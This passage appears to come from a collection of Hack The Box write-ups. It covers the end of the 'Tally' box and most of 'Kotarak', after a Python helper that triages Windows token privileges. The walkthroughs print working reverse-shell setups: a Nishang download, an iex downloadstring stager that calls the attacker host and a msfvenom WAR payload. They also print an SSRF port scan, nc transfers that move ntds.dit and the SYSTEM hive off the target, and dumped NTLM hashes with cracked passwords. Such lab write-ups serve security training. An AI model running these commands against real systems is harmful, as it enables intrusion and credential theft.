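# processes, reading or writing past ACLs, loading drivers). This triage set is an
# assumption of this example; extend it to match your own policy.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate a client token (Potato-family escalation)",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
    "SeDebugPrivilege": "open and read any process, including LSASS",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Constructed sample modelled on the xp_cmdshell "whoami /priv" output above
# (NULL rows and separator lines included, as sqsh prints them).
SAMPLE_WHOAMI_PRIV = """\
output
---------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
NULL
(13 rows affected, return status = 0)
"""


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Return {privilege_name: 'Enabled' | 'Disabled'} from whoami /priv output."""
    privileges: Dict[str, str] = {}
    for raw in text.splitlines():
        # strip() also removes stray '*' so a markdown-bolded line still parses
        parts = raw.strip().strip("*").split()
        if len(parts) < 2 or not parts[0].startswith("Se"):
            continue
        state = parts[-1]
        if state not in ("Enabled", "Disabled"):
            continue
        privileges[parts[0]] = state
    return privileges


def risky_privileges(privileges: Dict[str, str], only_enabled: bool = True) -> List[str]:
    """Names of held privileges that fall in the triage set, sorted for stable output."""
    return sorted(
        name for name, state in privileges.items()
        if name in HIGH_RISK_PRIVILEGES and (state == "Enabled" or not only_enabled)
    )


def triage_report(text: str) -> List[str]:
    """Lines a reviewer can paste straight into a finding."""
    privileges = parse_whoami_priv(text)
    report = [f"{len(privileges)} privileges parsed"]
    for name in risky_privileges(privileges, only_enabled=False):
        report.append(f"{name}: {privileges[name]} - {HIGH_RISK_PRIVILEGES[name]}")
    return report


if __name__ == "__main__":
    print("\n".join(triage_report(SAMPLE_WHOAMI_PRIV)))
```

A disabled privilege is still held by the token and can be re-enabled by the process, which is why `risky_privileges(..., only_enabled=False)` exists. Defensively the fix is the account rather than the privilege: run SQL Server under a virtual or managed service account with the least privileges it needs, leave xp_cmdshell disabled, and alert on `sp_configure` changes to it.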
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
--2020-12-23 17:21:02-- https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.36.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.36.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4339 (4.2K) [text/plain]
Saving to: Invoke-PowerShellTcp.ps1
Invoke-PowerShellTcp.ps1 100%[=======================================>] 4.24K --.-KB/s in 0s
2020-12-23 17:21:02 (21.8 MB/s) - Invoke-PowerShellTcp.ps1 saved [4339/4339]
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001' >> Invoke-PowerShellTcp.ps1
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ cat Invoke-PowerShellTcp.ps1 | tail -n2
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ cat Invoke-PowerShellTcp.ps1 | tail -n5
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ mv Invoke-PowerShellTcp.ps1 rev9001.ps1
![](prg/6/7.png) ![](prg/6/8.png)
[ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56942
Windows PowerShell running as user Sarah on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
tally\sarah
PS C:\Windows\system32> cd /
PS C:\> cd Users
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 18/09/2017 22:35 .NET v2.0
d----- 18/09/2017 22:35 .NET v2.0 Classic
d----- 30/08/2017 01:14 .NET v4.5
d----- 30/08/2017 01:14 .NET v4.5 Classic
d----- 17/09/2017 21:33 Administrator
d----- 18/09/2017 22:35 Classic .NET AppPool
d-r--- 21/11/2016 01:24 Public
d----- 13/10/2017 23:57 Sarah
d----- 12/10/2017 21:28 SQLSERVERAGENT
d----- 02/09/2017 22:46 SQLTELEMETRY
d----- 13/09/2017 21:27 Tim
PS C:\Users> cd Sarah
PS C:\Users\Sarah> cd Desktop
PS C:\Users\Sarah\Desktop> dir
Directory: C:\Users\Sarah\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 01/10/2017 22:32 916 browser.bat
-a---- 17/09/2017 21:50 845 FTP.lnk
-a---- 23/09/2017 21:11 297 note to tim (draft).txt
-a---- 19/10/2017 21:49 17152 SPBestWarmUp.ps1
-a---- 19/10/2017 22:48 11010 SPBestWarmUp.xml
-a---- 17/09/2017 21:48 1914 SQLCMD.lnk
-a---- 21/09/2017 00:46 129 todo.txt
-ar--- 31/08/2017 02:04 32 user.txt
-a---- 17/09/2017 21:49 936 zz_Migration.lnk
PS C:\Users\Sarah\Desktop> type user.txt
beXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there you go! We have been able to print out the user flag.
## **Part 3 : Getting Root Access**
Now in order to privesc on this box we need to first take a look at sarah's desktop files:
PS C:\Users\Sarah\Desktop> dir
Directory: C:\Users\Sarah\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 01/10/2017 22:32 916 browser.bat
-a---- 17/09/2017 21:50 845 FTP.lnk
-a---- 23/09/2017 21:11 297 note to tim (draft).txt
-a---- 19/10/2017 21:49 17152 SPBestWarmUp.ps1
-a---- 19/10/2017 22:48 11010 SPBestWarmUp.xml
-a---- 17/09/2017 21:48 1914 SQLCMD.lnk
-a---- 21/09/2017 00:46 129 todo.txt
-ar--- 31/08/2017 02:04 32 user.txt
-a---- 17/09/2017 21:49 936 zz_Migration.lnk
PS C:\Users\Sarah\Desktop> type "note to tim (draft).txt"
Hi Tim,
As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.
Thanks,
Sarah
There are multiple ways to privesc here. The first is SPBestWarmUp.ps1 on Sarah's desktop: a script that Sarah can write to and that is executed every hour under the Administrator account, so we replace its contents with a stager for our second reverse shell payload:
PS C:\Users\Sarah\Desktop> echo "iex(new-object net.webclient).downloadstring('http://10.10.14.6:9005/rev9006.ps1')" > SPBestWarmUp.ps1
[ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
→ nc -lvnp 9006
listening on [any] 9006 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56986
Windows PowerShell running as user Administrator on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\Sarah\Desktop>whoami
tally\administrator
PS C:\Users\Sarah\Desktop>cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop>type root.txt
60XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there we have it!
## **Conclusion**
Here we can see the progress graph :
![](img/7_graph.png)

Hard/7.md Normal file
# Kotarak Writeup
![](img/6.png)
## Introduction :
Kotarak is a hard linux box released back in September 2017.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to find open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.55 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 8080/tcp on 10.10.10.55
Discovered open port 22/tcp on 10.10.10.55
Discovered open port 8009/tcp on 10.10.10.55
Discovered open port 60000/tcp on 10.10.10.55
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
→ sudo nmap -sCV -p8080,22,8009,60000 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 22:50 CET
Nmap scan report for 10.10.10.55
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
| 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Kotarak Web Hosting
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.68 seconds
## **Part 2 : Getting User Access**
As our nmap scan points out, port 8080 seems to be interesting so let's investigate it:
![](prg/7/1.png)
Most Apache Tomcat installs expose the manager application at /manager/html, as you can see:
![](prg/7/2.png)
You can't bruteforce the password here because the service will lock the account, so let's keep poking around the other port that our nmap scan picked up:
![](prg/7/3.png)
Here we get an interesting page with a URL prompt, so we send the request to Burp Suite's Repeater:
![](prg/7/4.png) ![](prg/7/5.png) ![](prg/7/6.png)
Here we see that a regex rejects the word "file", so we can't use it to read files on the machine; next we test whether the prompt will fetch from local ports:
![](prg/7/6.png)
It works for port 60000, but we know that one already; let's use wfuzz to enumerate the other local ports:
[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ wfuzz -c -z range,1-65535 http://10.10.10.55:60000/url.php\?path\=http://localhost:FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
Total requests: 65535
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 2 L 0 W 2 Ch "1"
000000039: 200 2 L 0 W 2 Ch "39"
000000015: 200 2 L 0 W 2 Ch "15"
000000003: 200 2 L 0 W 2 Ch "3"
000000007: 200 2 L 0 W 2 Ch "7"
000000031: 200 2 L 0 W 2 Ch "31"
000000034: 200 2 L 0 W 2 Ch "34"
000000033: 200 2 L 0 W 2 Ch "33"
000000030: 200 2 L 0 W 2 Ch "30"
000000029: 200 2 L 0 W 2 Ch "29"
000000032: 200 2 L 0 W 2 Ch "32"
000000028: 200 2 L 0 W 2 Ch "28"
000000038: 200 2 L 0 W 2 Ch "38"
000000027: 200 2 L 0 W 2 Ch "27"
000000023: 200 2 L 0 W 2 Ch "23"
000000024: 200 2 L 0 W 2 Ch "24"
000000025: 200 2 L 0 W 2 Ch "25"
000000026: 200 2 L 0 W 2 Ch "26"
000000022: 200 4 L 4 W 62 Ch "22"
000000021: 200 2 L 0 W 2 Ch "21"
000000020: 200 2 L 0 W 2 Ch "20"
000000014: 200 2 L 0 W 2 Ch "14"
000000017: 200 2 L 0 W 2 Ch "17"
000000018: 200 2 L 0 W 2 Ch "18"
000000019: 200 2 L 0 W 2 Ch "19"
000000016: 200 2 L 0 W 2 Ch "16"
000000013: 200 2 L 0 W 2 Ch "13"
000000012: 200 2 L 0 W 2 Ch "12"
000000008: 200 2 L 0 W 2 Ch "8"
000000011: 200 2 L 0 W 2 Ch "11"
000000009: 200 2 L 0 W 2 Ch "9"
000000006: 200 2 L 0 W 2 Ch "6"
000000010: 200 2 L 0 W 2 Ch "10"
000000005: 200 2 L 0 W 2 Ch "5"
000000002: 200 2 L 0 W 2 Ch "2"
000000054: 200 2 L 0 W 2 Ch "54"
000000004: 200 2 L 0 W 2 Ch "4"
000000042: 200 2 L 0 W 2 Ch "42"
000000046: 200 2 L 0 W 2 Ch "46"
Here we can see the junk responses: an empty body of 2 lines and 2 characters for every port that isn't listening. We filter those out with the option --hl=2, which hides responses that are 2 lines long:
[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php\?path\=http://localhost:FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
Total requests: 65535
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000022: 200 4 L 4 W 62 Ch "22"
000000090: 200 11 L 18 W 156 Ch "90"
000000110: 200 17 L 24 W 187 Ch "110"
000000200: 200 3 L 2 W 22 Ch "200"
000000320: 200 26 L 109 W 1232 Ch "320"
000000888: 200 78 L 265 W 3955 Ch "888"
Total time: 262.3381
Processed Requests: 54927
Filtered Requests: 54921
Requests/sec.: 209.3748
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 28: Operation timed out after 90000 milliseconds with 0 bytes received
So here we have a few interesting responses: ports 22, 90, 110, 200, 320 and 888. You would have to test each one of them, but the important one right now is 888:
![](prg/7/8.png)
Press Ctrl+U to view the source code:
![](prg/7/9.png)
and navigate to ?doc=backup:
![](prg/7/10.png)
Select the URL and press Ctrl+U to URL-encode it:
![](prg/7/11.png)
And we found some credentials: admin:3@g01PdhB! So let's try to log in on the Tomcat login page we found earlier at http://10.10.10.55:8080/manager/html
![](prg/7/12.png)
And we now have access to the Tomcat web manager. From here we want to upload a malicious WAR file to get a shell.
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~]
→ msfvenom -l payloads | grep java
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
java/shell_reverse_tcp Connect back to attacker and spawn a command shell
Here we want msfvenom's java/jsp_shell_reverse_tcp:
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=9090 -f war > ippsecrocks.war
Payload size: 1093 bytes
Final size of war file: 1093 bytes
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ l
total 12K
drwxr-xr-x 2 nothing nothing 4.0K Dec 22 14:17 .
drwxr-xr-x 5 nothing nothing 4.0K Dec 21 17:43 ..
-rw-r--r-- 1 nothing nothing 1.1K Dec 22 14:17 ippsecrocks.war
![](prg/7/13.png) ![](prg/7/14.png)
Now that we got a shell, let's upgrade it to a fully interactive shell:
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~]
→ nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 42176
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat@kotarak-dmz:/$ ^Z
[1] + 257499 suspended nc -lvnp 9090
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~]
→ stty raw -echo ; fg
[1] + 257499 continued nc -lvnp 9090
tomcat@kotarak-dmz:/$
What you need to remember to get a fully interactive reverse shell is the following:
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z (or ^Z)
stty raw -echo ; fg
export TERM=screen-256color
export SHELL=bash
stty rows 40 columns 125
reset
And now we have a shell that we can clear, use tab completion in and run vi from.
tomcat@kotarak-dmz:/$ id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
tomcat@kotarak-dmz:/$ ls -lash backups/
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 27 root root 4.0K Aug 29 2017 ..
4.0K drwxr-xr-x 2 root root 4.0K Jul 21 2017 backups
tomcat@kotarak-dmz:/$ ls -lash backups/backups/
total 12K
4.0K drwxr-xr-x 2 root root 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 3 root root 4.0K Jul 21 2017 ..
4.0K -rw-r----- 1 root root 2.3K Jul 12 2017 tomcat-users.xml
tomcat@kotarak-dmz:/$ cat backups/backups/tomcat-users.xml
cat: backups/backups/tomcat-users.xml: Permission denied
tomcat@kotarak-dmz:/$ ls -lash /home
total 16K
4.0K drwxr-xr-x 4 root root 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 27 root root 4.0K Aug 29 2017 ..
4.0K drwxr-xr-x 4 atanas atanas 4.0K Aug 29 2017 atanas
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 tomcat
tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/
total 12K
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 4 root root 4.0K Jul 21 2017 ..
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 to_archive
tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/to_archive/
total 12K
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 ..
4.0K drwxr-xr-x 2 tomcat tomcat 4.0K Jul 21 2017 pentest_data
tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/to_archive/pentest_data/
total 28M
4.0K drwxr-xr-x 2 tomcat tomcat 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 ..
17M -rw-r--r-- 1 tomcat tomcat 17M Jul 21 2017 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
12M -rw-r--r-- 1 tomcat tomcat 12M Jul 21 2017 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
After poking around a bit we found an ntds.dit and a SYSTEM registry hive grabbed with psexec. These are normally found on Windows Active Directory domain controllers: the .dit file is the AD database (policies, users and, most importantly, password hashes) and the SYSTEM hive holds the key needed to decrypt them. So let's get these files onto our local machine:
_Terminal 1:_
nc 10.10.14.6 9093 < file.bin
nc 10.10.14.6 9094 < file.dit
_Terminal 2:_
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ nc -lvnp 9093 > SYSTEM
listening on [any] 9093 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 48340
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ nc -lvnp 9094 > ntds.dit
listening on [any] 9094 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 32822
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ file *
ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
SYSTEM: MS Windows registry file, NT/2000 or above
Now that we have what we needed, let's use impacket to dump the secrets using both files:
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:6c53b16d11a496d0535959885ea7c79c04945889028704e2a4d1ca171e4374e2
Administrator:aes128-cts-hmac-sha1-96:e2a25474aa9eb0e1525d0f50233c0274
Administrator:des-cbc-md5:75375eda54757c2f
WIN-3G2B0H151AC$:aes256-cts-hmac-sha1-96:84e3d886fe1a81ed415d36f438c036715fd8c9e67edbd866519a2358f9897233
WIN-3G2B0H151AC$:aes128-cts-hmac-sha1-96:e1a487ca8937b21268e8b3c41c0e4a74
WIN-3G2B0H151AC$:des-cbc-md5:b39dc12a920457d5
WIN-3G2B0H151AC$:rc4_hmac:668d49ebfdb70aeee8bcaeac9e3e66fd
krbtgt:aes256-cts-hmac-sha1-96:14134e1da577c7162acb1e01ea750a9da9b9b717f78d7ca6a5c95febe09b35b8
krbtgt:aes128-cts-hmac-sha1-96:8b96c9c8ea354109b951bfa3f3aa4593
krbtgt:des-cbc-md5:10ef08047a862046
krbtgt:rc4_hmac:ca1ccefcb525db49828fbb9d68298eee
WIN2K8$:aes256-cts-hmac-sha1-96:289dd4c7e01818f179a977fd1e35c0d34b22456b1c8f844f34d11b63168637c5
WIN2K8$:aes128-cts-hmac-sha1-96:deb0ee067658c075ea7eaef27a605908
WIN2K8$:des-cbc-md5:d352a8d3a7a7380b
WIN2K8$:rc4_hmac:160f6c1db2ce0994c19c46a349611487
WINXP1$:aes256-cts-hmac-sha1-96:347a128a1f9a71de4c52b09d94ad374ac173bd644c20d5e76f31b85e43376d14
WINXP1$:aes128-cts-hmac-sha1-96:0e4c937f9f35576756a6001b0af04ded
WINXP1$:des-cbc-md5:984a40d5f4a815f2
WINXP1$:rc4_hmac:6f5e87fd20d1d8753896f6c9cb316279
WIN2K31$:aes256-cts-hmac-sha1-96:f486b86bda928707e327faf7c752cba5bd1fcb42c3483c404be0424f6a5c9f16
WIN2K31$:aes128-cts-hmac-sha1-96:1aae3545508cfda2725c8f9832a1a734
WIN2K31$:des-cbc-md5:4cbf2ad3c4f75b01
WIN2K31$:rc4_hmac:cdd7a7f43d06b3a91705900a592f3772
WIN7$:aes256-cts-hmac-sha1-96:b9921a50152944b5849c706b584f108f9b93127f259b179afc207d2b46de6f42
WIN7$:aes128-cts-hmac-sha1-96:40207f6ef31d6f50065d2f2ddb61a9e7
WIN7$:des-cbc-md5:89a1673723ad9180
WIN7$:rc4_hmac:24473180acbcc5f7d2731abe05cfa88c
atanas:aes256-cts-hmac-sha1-96:933a05beca1abd1a1a47d70b23122c55de2fedfc855d94d543152239dd840ce2
atanas:aes128-cts-hmac-sha1-96:d1db0c62335c9ae2508ee1d23d6efca4
atanas:des-cbc-md5:6b80e391f113542a
[*] Cleaning up...
Out of these hashes we want the following:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
It's quite odd to find Windows artefacts on a Linux machine, so let's see which machines the box we have a shell on can talk to / is currently talking to:
tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ arp -a
? (10.0.3.133) at 00:16:3e:c9:bd:b1 [ether] on lxcbr0
? (10.10.10.2) at 00:50:56:b9:35:90 [ether] on eth0
tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ nc -v 10.0.3.133 22
Connection to 10.0.3.133 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
However, it seems the box Kotarak is talking to isn't a Windows machine either. Therefore we'll need to crack the hashes we got:
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ vim hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ awk -F: '{print $4}' hashes
e64fe0f24ba2489c05e64354d74ebd11
2b576acbe6bcfda7294d6bd18041b8fe
![](prg/7/162.png) ![](prg/7/17.png)
And we have credentials! We found the passwords Password123! and f16tomcat!, so let's log in as atanas via SSH:
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ ssh atanas@10.10.10.55
atanas@10.10.10.55's password:
Permission denied, please try again.
atanas@10.10.10.55's password:
We can't, so we go back to our previous reverse shell and su there instead.
![](prg/7/18.png)
tomcat@kotarak-dmz:/$
tomcat@kotarak-dmz:/$ su - atanas
Password: f16tomcat!
atanas@kotarak-dmz:~$ ls -l
total 4
-rw-rw---- 1 atanas atanas 33 Jul 19 2017 user.txt
atanas@kotarak-dmz:~$ cat user.txt
93XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we have the user flag!
## **Part 3 : Getting Root Access**
To get the root flag we first check which groups the user is in:
atanas@kotarak-dmz:~$ id
uid=1000(atanas) gid=1000(atanas) groups=1000(atanas),4(adm),6(disk),24(cdrom),30(dip),34(backup),46(plugdev),115(lpadmin),116(sambashare)
atanas@kotarak-dmz:~$ ps -ef | grep lxc
root 914 1 0 Dec21 ? 00:00:00 /usr/bin/lxcfs /var/lib/lxcfs/
lxc-dns+ 1381 1 0 Dec21 ? 00:00:00 dnsmasq -u lxc-dnsmasq --strict-order --bind-interfaces --pid-file=/run/lxc/dnsmasq.pid --listen-address 10.0.3.1 --dhcp-range 10.0.3.2,10.0.3.254 --dhcp-lease-max=253 --dhcp-no-override --except-interface=lo --interface=lxcbr0 --dhcp-leasefile=/var/lib/misc/dnsmasq.lxcbr0.leases --dhcp-authoritative
root 1413 1 0 Dec21 ? 00:00:00 [lxc monitor] /var/lib/lxc kotarak-int
atanas 83412 83387 0 10:29 pts/2 00:00:00 grep --color=auto lxc
Here we see something odd: the user atanas is in the disk group, which means he has access to the block devices on this machine. Moreover, ps -ef shows some lxc processes running, so it's safe to assume our next step is to look into the LXC container. But first let's poke around the disks, since we should have access to them:
atanas@kotarak-dmz:~$ ls -lash /dev/sd*
0 brw-rw---- 1 root disk 8, 0 Dec 21 11:45 /dev/sda
0 brw-rw---- 1 root disk 8, 1 Dec 21 11:45 /dev/sda1
0 brw-rw---- 1 root disk 8, 2 Dec 21 11:45 /dev/sda2
0 brw-rw---- 1 root disk 8, 5 Dec 21 11:45 /dev/sda5
atanas@kotarak-dmz:~$ mount | grep root
/dev/mapper/Kotarak--vg-root on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
And here we're hinted at the mounted filesystem Kotarak--vg-root:
atanas@kotarak-dmz:~$ ls -lash /dev/mapper/Kotarak--vg-root
0 lrwxrwxrwx 1 root root 7 Dec 21 11:45 /dev/mapper/Kotarak--vg-root -> ../dm-0
And here we see that it's a symlink to /dev/dm-0:
atanas@kotarak-dmz:~$ ls -lash /dev/dm-0
0 brw-rw---- 1 root disk 252, 0 Dec 21 11:45 /dev/dm-0
strings /dev/dm-0
^C
Running strings on dm-0 shows that we can actually read the device, so let's send it over to our local machine. First let's check that everything we need is there:
